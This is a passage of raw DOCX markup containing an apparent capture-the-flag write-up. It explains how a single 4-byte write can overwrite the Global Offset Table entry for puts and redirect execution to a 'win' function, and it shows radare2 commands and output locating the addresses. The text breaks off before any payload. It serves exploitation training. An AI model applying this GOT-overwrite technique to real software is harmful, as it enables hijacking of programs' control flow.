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color="000000" w:space="0" w:sz="0" w:val="none"/>
          <w:left w:color="000000" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="000000" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="000000" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="000000" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="300" w:line="408" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For this problem, we got one 4 byte write and we need to call the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">win</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function. As you can see, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">puts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are the only two functions called after the write, so we need to change the behavior of one of the two functions. Because aslr is enabled, we need to look for things that stay constant. One of these things is the </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="5694f1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Global Offset Table</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The Global Offset Table is the thing that allows a c program to call libc libraries and serve as a jumping point for the program. If we modify this jumping point, we can make the program execute code at a different address than intended.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:pBdr>
          <w:top w:color="000000" w:space="0" w:sz="0" w:val="none"/>
          <w:left w:color="000000" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="000000" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="000000" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="000000" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="300" w:line="408" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Our first step will be to extract the GOT address of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">puts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function and the address of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">win</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function. This could be easily done with radare2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ r2 ./auth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="f5871f"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x08048450</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">]&gt; aaaa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="f5871f"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x08048450</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">]&gt; afl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="f5871f"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x080483d0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="f5871f"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="f5871f"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">            sym.imp.puts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="f5871f"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x0804854b</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="f5871f"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="f5871f"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">25</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">           sym.win</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="f5871f"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x08048450</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">]&gt; pd </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="f5871f"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> @ sym.imp.puts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/ (fcn) sym.imp.puts </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="f5871f"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">|   sym.imp.puts (const char *s);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">|           ; CALL XREFS from sym.main (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="f5871f"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x80485aa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="f5871f"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x80485f1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
